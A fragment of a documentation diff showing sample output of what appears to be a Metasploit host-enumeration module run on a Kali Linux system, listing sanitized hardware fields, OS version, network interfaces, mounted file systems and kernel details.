+  Board Vendor       Sanitized
+  Board Version      111
+  Chassis Asset Tag
+  Chassis Vendor     Sanitized
+  Date               04/17/2023
+  Product Family     Sanitized
+  Product Name       Sanitized
+  System Vendor      Sanitized
+  Vendor             Sanitized
+  Version            1.0.0
+
+[+] OS Information
+==============
+
+  Field             Value
+  -----             -----
+  Family            kali
+  Name              Kali GNU/Linux
+  Pretty Name       Kali GNU/Linux Rolling
+  Version           2023.3
+  Version Codename  kali-rolling
+  Version ID        2023.3
+
+[+] Network Interfaces
+==================
+
+  Device           MAC                Broadcast          State
+  ------           ---                ---------          -----
+  br-4b55fa64cd13  de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  down
+  br-65f1f7a9ff61  de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  down
+  docker0          de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  up
+  eth0             de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  down
+  lo               de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  unknown
+  vethe418d5c      de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  up
+  wlan0            de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  up
+
+[+] File Systems
+============
+
+  Device                              Mount Point     FS Type
+  ------                              -----------     -------
+  /dev/mapper/map--new--vg-root       /               ext4
+  /dev/nvme0n1p1                      /boot/efi       vfat
+  /dev/nvme1n1p2                      /boot           ext2
+  tmpfs                               /run            tmpfs
+  tmpfs                               /run/lock       tmpfs
+  tmpfs                               /run/user/1000  tmpfs
+  tmpfs                               /run/user/125   tmpfs
+
+[+] uname Information
+=================
+
+  Field        Value
+  -----        -----
+  Arch         x86_64
+  Domain Name  (none)
+  Node Name    ragekali-new
+  OS Type      Linux
+  Release      6.3.0-kali1-amd64
+  Version      #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29)
+
+[*] Auxiliary module execution completed
+```
--- a/Show More
+++ b/Show More